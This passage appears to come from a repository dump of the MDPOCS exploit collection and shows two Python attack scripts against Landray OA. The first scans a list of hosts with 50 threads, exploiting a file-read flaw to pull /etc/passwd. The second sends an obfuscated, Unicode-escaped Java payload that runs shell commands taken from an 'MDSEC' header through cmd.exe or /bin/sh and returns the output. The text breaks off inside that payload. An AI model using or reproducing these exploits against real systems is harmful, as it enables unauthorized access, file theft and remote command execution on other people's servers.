 4 | # from:https://github.com/MD-SEC/MDPOCS
 5 | # fid="VHlOV1fIBBw+l3lE6qQaww=="
 6 | 
 7 | import sys
 8 | import requests
 9 | import csv
10 | import urllib3
11 | import hashlib
12 | from concurrent.futures import ThreadPoolExecutor
13 | 
14 | if len(sys.argv) != 2:
15 |     print(
16 |         '+----------------------------------------------------------------------------------------------------------+')
17 |     print(
18 |         '+ DES: by MDSEC as https://github.com/MD-SEC/MDPOCS                                                   +')
19 |     print(
20 |         '+----------------------------------------------------------------------------------------------------------+')
21 |     print(
22 |         '+ USE: python3 <filename> <hosts.txt>                                                                           +')
23 |     print(
24 |         '+ EXP: python3 Landray_Oa_Custom_FileRead_Poc.py url.txt                                                         +')
25 |     print(
26 |         '+----------------------------------------------------------------------------------------------------------+')
27 |     sys.exit()
28 | def poc(host):
29 |     url = host
30 |     headers = {
31 |         "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0",
32 |         "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
33 |         "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
34 |         "Accept-Encoding": "gzip, deflate",
35 |         "Content-Type": "application/x-www-form-urlencoded",
36 |         "Host": "%s" %host
37 |     }
38 |     data ='var={"body":{"file":"file:///etc/passwd"}}'
39 |     vulurl = "http://"+url + "/sys/ui/extend/varkind/custom.jsp"
40 |     try:
41 |         
42 |         r = requests.post(vulurl, headers=headers,data=data)
43 |         if r.status_code==200 and "root:x:0:0" in r.text :
44 |             print("http://"+host+":true")
45 |         else:
46 |             return 0
47 |             print (host+":false")
48 |     except:
49 |         print (host+":false")
50 | 
51 | 
52 | if __name__ == '__main__':
53 |     file = sys.argv[1]
54 |     data = open(file)
55 |     reader = csv.reader(data)
56 |     with ThreadPoolExecutor(50) as pool:
57 |         for row in reader:
58 |             pool.submit(poc, row[0])


--------------------------------------------------------------------------------
/Landray_Oa_Treexml_Rce_Poc.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python3
 2 | # -*- coding:utf-8 -*-
 3 | # author:MDSEC
 4 | # from:https://github.com/MD-SEC/MDPOCS
 5 | # app="Landray-OA系统" && fid="VK1JqEv42XM7Qmz2kSHEVw=="
 6 | 
 7 | import sys
 8 | import requests
 9 | import csv
10 | import urllib3
11 | import hashlib
12 | from concurrent.futures import ThreadPoolExecutor
13 | 
14 | if len(sys.argv) != 2:
15 |     print(
16 |         '+----------------------------------------------------------------------------------------------------------+')
17 |     print(
18 |         '+ DES: by MDSEC as https://github.com/MD-SEC/MDPOCS                                                   +')
19 |     print(
20 |         '+----------------------------------------------------------------------------------------------------------+')
21 |     print(
22 |         '+ USE: python3 <filename> <hosts.txt>                                                                           +')
23 |     print(
24 |         '+ EXP: python3 Landray_Oa_Treexml_Rce_Poc.py url.txt                                                         +')
25 |     print(
26 |         '+----------------------------------------------------------------------------------------------------------+')
27 |     sys.exit()
28 | proxysdata = {
29 | 'http': '127.0.0.1:8080'
30 | }
31 | def poc(host):
32 |     url = host
33 |     headers = {
34 |         "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0",
35 |         "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
36 |         "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
37 |         "Accept-Encoding": "",
38 |         "Host": "%s" %host,
39 |         "Content-Type": "application/x-www-form-urlencoded",
40 |         "MDSEC": "dir"
41 | 
42 |     }
43 |     data="s_bean=ruleFormulaValidate&script=\\u0062\\u006f\\u006f\\u006c\\u0065\\u0061\\u006e\\u0020\\u0066\\u006c\\u0061\\u0067\\u0020\\u003d\\u0020\\u0066\\u0061\\u006c\\u0073\\u0065\\u003b\\u0054\\u0068\\u0072\\u0065\\u0061\\u0064\\u0047\\u0072\\u006f\\u0075\\u0070\\u0020\\u0067\\u0072\\u006f\\u0075\\u0070\\u0020\\u003d\\u0020\\u0054\\u0068\\u0072\\u0065\\u0061\\u0064\\u002e\\u0063\\u0075\\u0072\\u0072\\u0065\\u006e\\u0074\\u0054\\u0068\\u0072\\u0065\\u0061\\u0064\\u0028\\u0029\\u002e\\u0067\\u0065\\u0074\\u0054\\u0068\\u0072\\u0065\\u0061\\u0064\\u0047\\u0072\\u006f\\u0075\\u0070\\u0028\\u0029\\u003b\\u006a\\u0061\\u0076\\u0061\\u002e\\u006c\\u0061\\u006e\\u0067\\u002e\\u0072\\u0065\\u0066\\u006c\\u0065\\u0063\\u0074\\u002e\\u0046\\u0069\\u0065\\u006c\\u0064\\u0020\\u0066\\u0020\\u003d\\u0020\\u0067\\u0072\\u006f\\u0075\\u0070\\u002e\\u0067\\u0065\\u0074\\u0043\\u006c\\u0061\\u0073\\u0073\\u0028\\u0029\\u002e\\u0067\\u0065\\u0074\\u0044\\u0065\\u0063\\u006c\\u0061\\u0072\\u0065\\u0064\\u0046\\u0069\\u0065\\u006c\\u0064\\u0028\\u0022\\u0074\\u0068\\u0072\\u0065\\u0061\\u0064\\u0073\\u0022\\u0029\\u003b\\u0066\\u002e\\u0073\\u0065\\u0074\\u0041\\u0063\\u0063\\u0065\\u0073\\u0073\\u0069\\u0062\\u006c\\u0065\\u0028\\u0074\\u0072\\u0075\\u0065\\u0029\\u003b\\u0054\\u0068\\u0072\\u0065\\u0061\\u0064\\u005b\\u005d\\u0020\\u0074\\u0068\\u0072\\u0065\\u0061\\u0064\\u0073\\u0020\\u003d\\u0020\\u0028\\u0054\\u0068\\u0072\\u0065\\u0061\\u0064\\u005b\\u005d\\u0029\\u0020\\u0066\\u002e\\u0067\\u0065\\u0074\\u0028\\u0067\\u0072\\u006f\\u0075\\u0070\\u0029\\u003b\\u0066\\u006f\\u0072\\u0020\\u0028\\u0069\\u006e\\u0074\\u0020\\u0069\\u0020\\u003d\\u0020\\u0030\\u003b\\u0020\\u0069\\u0020\\u003c\\u0020\\u0074\\u0068\\u0072\\u0065\\u0061\\u0064\\u0073\\u002e\\u006c\\u0065\\u006e\\u0067\\u0074\\u0068\\u003b\\u0020\\u0069\\u002b\\u002b\\u0029\\u0020\\u007b\\u0020\\u0074\\u0072\\u0079\\u0020\\u007b\\u0020\\u0054\\u0068\\u0072\\u0065\\u0061\\u0064\\u0020\\u0074\\u0020\\u003d\\u0020\\u0074\\u0068\\u0072\\u0065\\u0061\\u0064\\u0073\\u005b\\u0069\\u005d\\u003b\\u0069\\u0066\\u0020\\u0028\\u0074\\u0020\\u003d\\u003d\\u0020\\u006e\\u0075\\u006c\\u006c\\u0029\\u0020\\u007b\\u0020\\u0063\\u006f\\u006e\\u0074\\u0069\\u006e\\u0075\\u0065\\u003b\\u0020\\u007d\\u0053\\u0074\\u0072\\u0069\\u006e\\u0067\\u0020\\u0073\\u0074\\u0072\\u0020\\u003d\\u0020\\u0074\\u002e\\u0067\\u0065\\u0074\\u004e\\u0061\\u006d\\u0065\\u0028\\u0029\\u003b\\u0069\\u0066\\u0020\\u0028\\u0073\\u0074\\u0072\\u002e\\u0063\\u006f\\u006e\\u0074\\u0061\\u0069\\u006e\\u0073\\u0028\\u0022\\u0065\\u0078\\u0065\\u0063\\u0022\\u0029\\u0020\\u007c\\u007c\\u0020\\u0021\\u0073\\u0074\\u0072\\u002e\\u0063\\u006f\\u006e\\u0074\\u0061\\u0069\\u006e\\u0073\\u0028\\u0022\\u0068\\u0074\\u0074\\u0070\\u0022\\u0029\\u0029\\u0020\\u007b\\u0020\\u0063\\u006f\\u006e\\u0074\\u0069\\u006e\\u0075\\u0065\\u003b\\u0020\\u007d\\u0066\\u0020\\u003d\\u0020\\u0074\\u002e\\u0067\\u0065\\u0074\\u0043\\u006c\\u0061\\u0073\\u0073\\u0028\\u0029\\u002e\\u0067\\u0065\\u0074\\u0044\\u0065\\u0063\\u006c\\u0061\\u0072\\u0065\\u0064\\u0046\\u0069\\u0065\\u006c\\u0064\\u0028\\u0022\\u0074\\u0061\\u0072\\u0067\\u0065\\u0074\\u0022\\u0029\\u003b\\u0066\\u002e\\u0073\\u0065\\u0074\\u0041\\u0063\\u0063\\u0065\\u0073\\u0073\\u0069\\u0062\\u006c\\u0065\\u0028\\u0074\\u0072\\u0075\\u0065\\u0029\\u003b\\u004f\\u0062\\u006a\\u0065\\u0063\\u0074\\u0020\\u006f\\u0062\\u006a\\u0020\\u003d\\u0020\\u0066\\u002e\\u0067\\u0065\\u0074\\u0028\\u0074\\u0029\\u003b\\u0069\\u0066\\u0020\\u0028\\u0021\\u0028\\u006f\\u0062\\u006a\\u0020\\u0069\\u006e\\u0073\\u0074\\u0061\\u006e\\u0063\\u0065\\u006f\\u0066\\u0020\\u0052\\u0075\\u006e\\u006e\\u0061\\u0062\\u006c\\u0065\\u0029\\u0029\\u0020\\u007b\\u0020\\u0063\\u006f\\u006e\\u0074\\u0069\\u006e\\u0075\\u0065\\u003b\\u0020\\u007d\\u0066\\u0020\\u003d\\u0020\\u006f\\u0062\\u006a\\u002e\\u0067\\u0065\\u0074\\u0043\\u006c\\u0061\\u0073\\u0073\\u0028\\u0029\\u002e\\u0067\\u0065\\u0074\\u0044\\u0065\\u0063\\u006c\\u0061\\u0072\\u0065\\u0064\\u0046\\u0069\\u0065\\u006c\\u0064\\u0028\\u0022\\u0074\\u0068\\u0069\\u0073\\u0024\\u0030\\u0022\\u0029\\u003b\\u0066\\u002e\\u0073\\u0065\\u0074\\u0041\\u0063\\u0063\\u0065\\u0073\\u0073\\u0069\\u0062\\u006c\\u0065\\u0028\\u0074\\u0072\\u0075\\u0065\\u0029\\u003b\\u006f\\u0062\\u006a\\u0020\\u003d\\u0020\\u0066\\u002e\\u0067\\u0065\\u0074\\u0028\\u006f\\u0062\\u006a\\u0029\\u003b\\u0074\\u0072\\u0079\\u0020\\u007b\\u0020\\u0066\\u0020\\u003d\\u0020\\u006f\\u0062\\u006a\\u002e\\u0067\\u0065\\u0074\\u0043\\u006c\\u0061\\u0073\\u0073\\u0028\\u0029\\u002e\\u0067\\u0065\\u0074\\u0044\\u0065\\u0063\\u006c\\u0061\\u0072\\u0065\\u0064\\u0046\\u0069\\u0065\\u006c\\u0064\\u0028\\u0022\\u0068\\u0061\\u006e\\u0064\\u006c\\u0065\\u0072\\u0022\\u0029\\u003b\\u0020\\u007d\\u0020\\u0063\\u0061\\u0074\\u0063\\u0068\\u0020\\u0028\\u004e\\u006f\\u0053\\u0075\\u0063\\u0068\\u0046\\u0069\\u0065\\u006c\\u0064\\u0045\\u0078\\u0063\\u0065\\u0070\\u0074\\u0069\\u006f\\u006e\\u0020\\u0065\\u0029\\u0020\\u007b\\u0020\\u0066\\u0020\\u003d\\u0020\\u006f\\u0062\\u006a\\u002e\\u0067\\u0065\\u0074\\u0043\\u006c\\u0061\\u0073\\u0073\\u0028\\u0029\\u002e\\u0067\\u0065\\u0074\\u0053\\u0075\\u0070\\u0065\\u0072\\u0063\\u006c\\u0061\\u0073\\u0073\\u0028\\u0029\\u002e\\u0067\\u0065\\u0074\\u0053\\u0075\\u0070\\u0065\\u0072\\u0063\\u006c\\u0061\\u0073\\u0073\\u0028\\u0029\\u002e\\u0067\\u0065\\u0074\\u0044\\u0065\\u0063\\u006c\\u0061\\u0072\\u0065\\u0064\\u0046\\u0069\\u0065\\u006c\\u0064\\u0028\\u0022\\u0068\\u0061\\u006e\\u0064\\u006c\\u0065\\u0072\\u0022\\u0029\\u003b\\u0020\\u007d\\u0066\\u002e\\u0073\\u0065\\u0074\\u0041\\u0063\\u0063\\u0065\\u0073\\u0073\\u0069\\u0062\\u006c\\u0065\\u0028\\u0074\\u0072\\u0075\\u0065\\u0029\\u003b\\u006f\\u0062\\u006a\\u0020\\u003d\\u0020\\u0066\\u002e\\u0067\\u0065\\u0074\\u0028\\u006f\\u0062\\u006a\\u0029\\u003b\\u0074\\u0072\\u0079\\u0020\\u007b\\u0020\\u0066\\u0020\\u003d\\u0020\\u006f\\u0062\\u006a\\u002e\\u0067\\u0065\\u0074\\u0043\\u006c\\u0061\\u0073\\u0073\\u0028\\u0029\\u002e\\u0067\\u0065\\u0074\\u0053\\u0075\\u0070\\u0065\\u0072\\u0063\\u006c\\u0061\\u0073\\u0073\\u0028\\u0029\\u002e\\u0067\\u0065\\u0074\\u0044\\u0065\\u0063\\u006c\\u0061\\u0072\\u0065\\u0064\\u0046\\u0069\\u0065\\u006c\\u0064\\u0028\\u0022\\u0067\\u006c\\u006f\\u0062\\u0061\\u006c\\u0022\\u0029\\u003b\\u0020\\u007d\\u0020\\u0063\\u0061\\u0074\\u0063\\u0068\\u0020\\u0028\\u004e\\u006f\\u0053\\u0075\\u0063\\u0068\\u0046\\u0069\\u0065\\u006c\\u0064\\u0045\\u0078\\u0063\\u0065\\u0070\\u0074\\u0069\\u006f\\u006e\\u0020\\u0065\\u0029\\u0020\\u007b\\u0020\\u0066\\u0020\\u003d\\u0020\\u006f\\u0062\\u006a\\u002e\\u0067\\u0065\\u0074\\u0043\\u006c\\u0061\\u0073\\u0073\\u0028\\u0029\\u002e\\u0067\\u0065\\u0074\\u0044\\u0065\\u0063\\u006c\\u0061\\u0072\\u0065\\u0064\\u0046\\u0069\\u0065\\u006c\\u0064\\u0028\\u0022\\u0067\\u006c\\u006f\\u0062\\u0061\\u006c\\u0022\\u0029\\u003b\\u0020\\u007d\\u0066\\u002e\\u0073\\u0065\\u0074\\u0041\\u0063\\u0063\\u0065\\u0073\\u0073\\u0069\\u0062\\u006c\\u0065\\u0028\\u0074\\u0072\\u0075\\u0065\\u0029\\u003b\\u006f\\u0062\\u006a\\u0020\\u003d\\u0020\\u0066\\u002e\\u0067\\u0065\\u0074\\u0028\\u006f\\u0062\\u006a\\u0029\\u003b\\u0066\\u0020\\u003d\\u0020\\u006f\\u0062\\u006a\\u002e\\u0067\\u0065\\u0074\\u0043\\u006c\\u0061\\u0073\\u0073\\u0028\\u0029\\u002e\\u0067\\u0065\\u0074\\u0044\\u0065\\u0063\\u006c\\u0061\\u0072\\u0065\\u0064\\u0046\\u0069\\u0065\\u006c\\u0064\\u0028\\u0022\\u0070\\u0072\\u006f\\u0063\\u0065\\u0073\\u0073\\u006f\\u0072\\u0073\\u0022\\u0029\\u003b\\u0066\\u002e\\u0073\\u0065\\u0074\\u0041\\u0063\\u0063\\u0065\\u0073\\u0073\\u0069\\u0062\\u006c\\u0065\\u0028\\u0074\\u0072\\u0075\\u0065\\u0029\\u003b\\u006a\\u0061\\u0076\\u0061\\u002e\\u0075\\u0074\\u0069\\u006c\\u002e\\u004c\\u0069\\u0073\\u0074\\u0020\\u0070\\u0072\\u006f\\u0063\\u0065\\u0073\\u0073\\u006f\\u0072\\u0073\\u0020\\u003d\\u0020\\u0028\\u006a\\u0061\\u0076\\u0061\\u002e\\u0075\\u0074\\u0069\\u006c\\u002e\\u004c\\u0069\\u0073\\u0074\\u0029\\u0020\\u0028\\u0066\\u002e\\u0067\\u0065\\u0074\\u0028\\u006f\\u0062\\u006a\\u0029\\u0029\\u003b\\u0066\\u006f\\u0072\\u0020\\u0028\\u0069\\u006e\\u0074\\u0020\\u006a\\u0020\\u003d\\u0020\\u0030\\u003b\\u0020\\u006a\\u0020\\u003c\\u0020\\u0070\\u0072\\u006f\\u0063\\u0065\\u0073\\u0073\\u006f\\u0072\\u0073\\u002e\\u0073\\u0069\\u007a\\u0065\\u0028\\u0029\\u003b\\u0020\\u002b\\u002b\\u006a\\u0029\\u0020\\u007b\\u0020\\u004f\\u0062\\u006a\\u0065\\u0063\\u0074\\u0020\\u0070\\u0072\\u006f\\u0063\\u0065\\u0073\\u0073\\u006f\\u0072\\u0020\\u003d\\u0020\\u0070\\u0072\\u006f\\u0063\\u0065\\u0073\\u0073\\u006f\\u0072\\u0073\\u002e\\u0067\\u0065\\u0074\\u0028\\u006a\\u0029\\u003b\\u0066\\u0020\\u003d\\u0020\\u0070\\u0072\\u006f\\u0063\\u0065\\u0073\\u0073\\u006f\\u0072\\u002e\\u0067\\u0065\\u0074\\u0043\\u006c\\u0061\\u0073\\u0073\\u0028\\u0029\\u002e\\u0067\\u0065\\u0074\\u0044\\u0065\\u0063\\u006c\\u0061\\u0072\\u0065\\u0064\\u0046\\u0069\\u0065\\u006c\\u0064\\u0028\\u0022\\u0072\\u0065\\u0071\\u0022\\u0029\\u003b\\u0066\\u002e\\u0073\\u0065\\u0074\\u0041\\u0063\\u0063\\u0065\\u0073\\u0073\\u0069\\u0062\\u006c\\u0065\\u0028\\u0074\\u0072\\u0075\\u0065\\u0029\\u003b\\u004f\\u0062\\u006a\\u0065\\u0063\\u0074\\u0020\\u0072\\u0065\\u0071\\u0020\\u003d\\u0020\\u0066\\u002e\\u0067\\u0065\\u0074\\u0028\\u0070\\u0072\\u006f\\u0063\\u0065\\u0073\\u0073\\u006f\\u0072\\u0029\\u003b\\u004f\\u0062\\u006a\\u0065\\u0063\\u0074\\u0020\\u0072\\u0065\\u0073\\u0070\\u0020\\u003d\\u0020\\u0072\\u0065\\u0071\\u002e\\u0067\\u0065\\u0074\\u0043\\u006c\\u0061\\u0073\\u0073\\u0028\\u0029\\u002e\\u0067\\u0065\\u0074\\u004d\\u0065\\u0074\\u0068\\u006f\\u0064\\u0028\\u0022\\u0067\\u0065\\u0074\\u0052\\u0065\\u0073\\u0070\\u006f\\u006e\\u0073\\u0065\\u0022\\u002c\\u0020\\u006e\\u0065\\u0077\\u0020\\u0043\\u006c\\u0061\\u0073\\u0073\\u005b\\u0030\\u005d\\u0029\\u002e\\u0069\\u006e\\u0076\\u006f\\u006b\\u0065\\u0028\\u0072\\u0065\\u0071\\u002c\\u0020\\u006e\\u0065\\u0077\\u0020\\u004f\\u0062\\u006a\\u0065\\u0063\\u0074\\u005b\\u0030\\u005d\\u0029\\u003b\\u0073\\u0074\\u0072\\u0020\\u003d\\u0020\\u0028\\u0053\\u0074\\u0072\\u0069\\u006e\\u0067\\u0029\\u0020\\u0072\\u0065\\u0071\\u002e\\u0067\\u0065\\u0074\\u0043\\u006c\\u0061\\u0073\\u0073\\u0028\\u0029\\u002e\\u0067\\u0065\\u0074\\u004d\\u0065\\u0074\\u0068\\u006f\\u0064\\u0028\\u0022\\u0067\\u0065\\u0074\\u0048\\u0065\\u0061\\u0064\\u0065\\u0072\\u0022\\u002c\\u0020\\u006e\\u0065\\u0077\\u0020\\u0043\\u006c\\u0061\\u0073\\u0073\\u005b\\u005d\\u007b\\u0053\\u0074\\u0072\\u0069\\u006e\\u0067\\u002e\\u0063\\u006c\\u0061\\u0073\\u0073\\u007d\\u0029\\u002e\\u0069\\u006e\\u0076\\u006f\\u006b\\u0065\\u0028\\u0072\\u0065\\u0071\\u002c\\u0020\\u006e\\u0065\\u0077\\u0020\\u004f\\u0062\\u006a\\u0065\\u0063\\u0074\\u005b\\u005d\\u007b\\u0022\\u004d\\u0044\\u0053\\u0045\\u0043\\u0022\\u007d\\u0029\\u003b\\u0069\\u0066\\u0020\\u0028\\u0073\\u0074\\u0072\\u0020\\u0021\\u003d\\u0020\\u006e\\u0075\\u006c\\u006c\\u0020\\u0026\\u0026\\u0020\\u0021\\u0073\\u0074\\u0072\\u002e\\u0069\\u0073\\u0045\\u006d\\u0070\\u0074\\u0079\\u0028\\u0029\\u0029\\u0020\\u007b\\u0020\\u0072\\u0065\\u0073\\u0070\\u002e\\u0067\\u0065\\u0074\\u0043\\u006c\\u0061\\u0073\\u0073\\u0028\\u0029\\u002e\\u0067\\u0065\\u0074\\u004d\\u0065\\u0074\\u0068\\u006f\\u0064\\u0028\\u0022\\u0073\\u0065\\u0074\\u0053\\u0074\\u0061\\u0074\\u0075\\u0073\\u0022\\u002c\\u0020\\u006e\\u0065\\u0077\\u0020\\u0043\\u006c\\u0061\\u0073\\u0073\\u005b\\u005d\\u007b\\u0069\\u006e\\u0074\\u002e\\u0063\\u006c\\u0061\\u0073\\u0073\\u007d\\u0029\\u002e\\u0069\\u006e\\u0076\\u006f\\u006b\\u0065\\u0028\\u0072\\u0065\\u0073\\u0070\\u002c\\u0020\\u006e\\u0065\\u0077\\u0020\\u004f\\u0062\\u006a\\u0065\\u0063\\u0074\\u005b\\u005d\\u007b\\u006e\\u0065\\u0077\\u0020\\u0049\\u006e\\u0074\\u0065\\u0067\\u0065\\u0072\\u0028\\u0032\\u0030\\u0030\\u0029\\u007d\\u0029\\u003b\\u0053\\u0074\\u0072\\u0069\\u006e\\u0067\\u005b\\u005d\\u0020\\u0063\\u006d\\u0064\\u0073\\u0020\\u003d\\u0020\\u0053\\u0079\\u0073\\u0074\\u0065\\u006d\\u002e\\u0067\\u0065\\u0074\\u0050\\u0072\\u006f\\u0070\\u0065\\u0072\\u0074\\u0079\\u0028\\u0022\\u006f\\u0073\\u002e\\u006e\\u0061\\u006d\\u0065\\u0022\\u0029\\u002e\\u0074\\u006f\\u004c\\u006f\\u0077\\u0065\\u0072\\u0043\\u0061\\u0073\\u0065\\u0028\\u0029\\u002e\\u0063\\u006f\\u006e\\u0074\\u0061\\u0069\\u006e\\u0073\\u0028\\u0022\\u0077\\u0069\\u006e\\u0064\\u006f\\u0077\\u0022\\u0029\\u0020\\u003f\\u0020\\u006e\\u0065\\u0077\\u0020\\u0053\\u0074\\u0072\\u0069\\u006e\\u0067\\u005b\\u005d\\u007b\\u0022\\u0063\\u006d\\u0064\\u002e\\u0065\\u0078\\u0065\\u0022\\u002c\\u0020\\u0022\\u002f\\u0063\\u0022\\u002c\\u0020\\u0073\\u0074\\u0072\\u007d\\u0020\\u003a\\u0020\\u006e\\u0065\\u0077\\u0020\\u0053\\u0074\\u0072\\u0069\\u006e\\u0067\\u005b\\u005d\\u007b\\u0022\\u002f\\u0062\\u0069\\u006e\\u002f\\u0073\\u0068\\u0022\\u002c\\u0020\\u0022\\u002d\\u0063\\u0022\\u002c\\u0020\\u0073\\u0074\\u0072\\u007d\\u003b\\u0053\\u0074\\u0072\\u0069\\u006e\\u0067\\u0020\\u0063\\u0068\\u0061\\u0072\\u0073\\u0065\\u0074\\u004e\\u0061\\u006d\\u0065\\u0020\\u003d\\u0020\\u0053\\u0079\\u0073\\u0074\\u0065\\u006d\\u002e\\u0067\\u0065\\u0074\\u0050\\u0072\\u006f\\u0070\\u0065\\u0072\\u0074\\u0079\\u0028\\u0022\\u006f\\u0073\\u002e\\u006e\\u0061\\u006d\\u0065\\u0022\\u0029\\u002e\\u0074\\u006f\\u004c\\u006f\\u0077\\u0065\\u0072\\u0043\\u0061\\u0073\\u0065\\u0028\\u0029\\u002e\\u0063\\u006f\\u006e\\u0074\\u0061\\u0069\\u006e\\u0073\\u0028\\u0022\\u0077\\u0069\\u006e\\u0064\\u006f\\u0077\\u0022\\u0029\\u0020\\u003f\\u0020\\u0022\\u0047\\u0042\\u004b\\u0022\\u003a\\u0022\\u0055\\u0054\\u0046\\u002d\\u0038\\u0022\\u003b\\u0062\\u0079\\u0074\\u0065\\u005b\\u005d\\u0020\\u0074\\u0065\\u0078\\u0074\\u0032\\u0020\\u003d\\u0028\\u006e\\u0065\\u0077\\u0020\\u006a\\u0061\\u0076\\u0061\\u002e\\u0075\\u0074\\u0069\\u006c\\u002e\\u0053\\u0063\\u0061\\u006e\\u006e\\u0065\\u0072\\u0028\\u0028\\u006e\\u0065\\u0077\\u0020\\u0050\\u0072\\u006f\\u0063\\u0065\\u0073\\u0073\\u0042\\u0075\\u0069\\u006c\\u0064\\u0065\\u0072\\u0028\\u0063\\u006d\\u0064\\u0073\\u0029\\u0029\\u002e\\u0073\\u0074\\u0061\\u0072\\u0074\\u0028\\u0029\\u002e\\u0067\\u0065\\u0074\\u0049\\u006e\\u0070\\u0075\\u0074\\u0053\\u0074\\u0072\\u0065\\u0061\\u006d\\u0028\\u0029\\u002c\\u0063\\u0068\\u0061\\u0072\\u0073\\u0065\\u0074\\u004e\\u0061\\u006d\\u0065\\u0029\\u0029\\u002e\\u0075\\u0073\\u0065\\u0044\\u0065\\u006c\\u0069\\u006d\\u0069\\u0074\\u0065\\u0072\\u0028\\u0022\\u005c\\u005c\\u0041\\u0022\\u0029\\u002e\\u006e\\u0065\\u0078\\u0074\\u0028\\u0029\\u002e\\u0067\\u0065\\u0074\\u0042\\u0079\\u0074\\u0065\\u0073\\u0028\\u0063\\u0068\\u0061\\u0072\\u0073\\u0065\\u0074\\u004e\\u0061\\u006d\\u0065\\u0029\\u003b\\u0062\\u0079\\u0074\\u0065\\u005b\\u005d\\u0020\\u0072\\u0065\\u0073\\u0075\\u006c\\u0074\\u003d\\u0028\\u0022\\u0045\\u0078\\u0065\\u0063\\u0075\\u0074\\u0065\\u003a\\u0020\\u0020\\u0020\\u0020\\u0022\\u002b\\u006e\\u0065\\u0077\\u0020\\u0053\\u0074\\u0072\\u0069\\u006e\\u0067\\u0028\\u0074\\u0065\\u0078\\u0074\\u0032\\u002c\\u0022\\u0075\\u0074\\u0066\\u002d\\u0038\\u0022\\u0029\\u0029\\u002e\\u0067\\u0065\\u0074\\u0042\\u0079\\u0074\\u0065\\u0073\\u0028\\u0063\\u0068\\u0061\\u0072\\u0073\\u0065\\u0074\\u004e\\u0061\\u006d\\u0065\\u0029\\u003b\\u0074\\u0072\\u0079\\u0020\\u007b\\u0020\\u0043\\u006c\\u0061\\u0073\\u0073\\u0020\\u0063\\u006c\\u0073\\u0020\\u003d\\u0020\\u0043\\u006c\\u0061\\u0073\\u0073\\u002e\\u0066\\u006f\\u0072\\u004e\\u0061\\u006d\\u0065\\u0028\\u0022\\u006f\\u0072\\u0067\\u002e\\u0061\\u0070\\u0061\\u0063\\u0068\\u0065\\u002e\\u0074\\u006f\\u006d\\u0063\\u0061\\u0074\\u002e\\u0075\\u0074\\u0069\\u006c\\u002e\\u0062\\u0075\\u0066\\u002e\\u0042\\u0079\\u0074\\u0065\\u0043\\u0068\\u0075\\u006e\\u006b\\u0022\\u0029\\u003b\\u006f\\u0062\\u006a\\u0020\\u003d\\u0020\\u0063\\u006c\\u0073\\u002e\\u006e\\u0065\\u0077\\u0049\\u006e\\u0073\\u0074\\u0061\\u006e\\u0063\\u0065\\u0028\\u0029\\u003b\\u0063\\u006c\\u0073\\u002e\\u0067\\u0065\\u0074\\u0044\\u0065\\u0063\\u006c\\u0061\\u0072\\u0065\\u0064\\u004d\\u0065\\u0074\\u0068\\u006f\\u0064\\u0028\\u0022\\u0073\\u0065\\u0074\\u0042\\u0079\\u0074\\u0065\\u0073\\u0022\\u002c\\u0020\\u006e\\u0065\\u0077\\u0020\\u0043\\u006c\\u0061\\u0073\\u0073\\u005b\\u005d\\u007b\\u0062\\u0079\\u0074\\u0065\\u005b\\u005d\\u002e\\u0063\\u006c\\u0061\\u0073\\u0073\\u002c\\u0020\\u0069\\u006e\\u0074\\u002e\\u0063\\u006c\\u0061\\u0073\\u0073\\u002c\\u0020\\u0069\\u006e\\u0074\\u002e\\u0063\\u006c\\u0061\\u0073\\u0073\\u007d\\u0029\\u002e\\u0069\\u006e\\u0076\\u006f\\u006b\\u0065\\u0028\\u006f\\u0062\\u006a\\u002c\\u0020\\u006e\\u0065\\u0077\\u0020\\u004f\\u0062\\u006a\\u0065\\u0063\\u0074\\u005b\\u005d\\u007b\\u0072\\u0065\\u0073\\u0075\\u006c\\u0074\\u002c\\u0020\\u006e\\u0065\\u0077\\u0020\\u0049\\u006e\\u0074\\u0065\\u0067\\u0065\\u0072\\u0028\\u0030\\u0029\\u002c\\u0020\\u006e\\u0065\\u0077\\u0020\\u0049\\u006e\\u0074\\u0065\\u0067\\u0065\\u0072\\u0028\\u0072\\u0065\\u0073\\u0075\\u006c\\u0074\\u002e\\u006c\\u0065\\u006e\\u0067\\u0074\\u0068\\u0029\\u007d\\u0029\\u003b\\u0072\\u0065\\u0073\\u0070\\u002e\\u0067\\u0065\\u0074\\u0043\\u006c\\u0061\\u0073\\u0073\\u0028\\u0029\\u002e\\u0067\\u0065\\u0074\\u004d\\u0065\\u0074\\u0068\\u006f\\u0064\\u0028\\u0022\\u0064\\u006f\\u0057\\u0072\\u0069\\u0074\\u0065\\u0022\\u002c\\u0020\\u006e\\u0065\\u0077\\u0020\\u0043\\u006c\\u0061\\u0073\\u0073\\u005b\\u005d\\u007b\\u0063\\u006c\\u0073\\u007d\\u0029\\u002e\\u0069\\u006e\\u0076\\u006f\\u006b\\u0065\\u0028\\u0072\\u0065\\u0073\\u0070\\u002c\\u0020\\u006e\\u0065\\u0077\\u0020\\u004f\\u0062\\u006a\\u0065\\u0063\\u0074\\u005b\\u005d\\u007b\\u006f\\u0062\\u006a\\u007d\\u0029\\u003b\\u0020\\u007d\\u0020\\u0063\\u0061\\u0074\\u0063\\u0068\\u0020\\u0028\\u004e\\u006f\\u0053\\u0075\\u0063\\u0068\\u004d\\u0065\\u0074\\u0068\\u006f\\u0064\\u0045\\u0078\\u0063\\u0065\\u0070\\u0074\\u0069\\u006f\\u006e\\u0020\\u0076\\u0061\\u0072\\u0035\\u0029\\u0020\\u007b\\u0020\\u0043\\u006c\\u0061\\u0073\\u0073\\u0020\\u0063\\u006c\\u0073\\u0020\\u003d\\u0020\\u0043\\u006c\\u0061\\u0073\\u0073\\u002e\\u0066\\u006f\\u0072\\u004e\\u0061\\u006d\\u0065\\u0028\\u0022\\u006a\\u0061\\u0076\\u0061\\u002e\\u006e\\u0069\\u006f\\u002e\\u0042\\u0079\\u0074\\u0065\\u0042\\u0075\\u0066\\u0066\\u0065\\u0072\\u0022\\u0029\\u003b\\u006f\\u0062\\u006a\\u0020\\u003d\\u0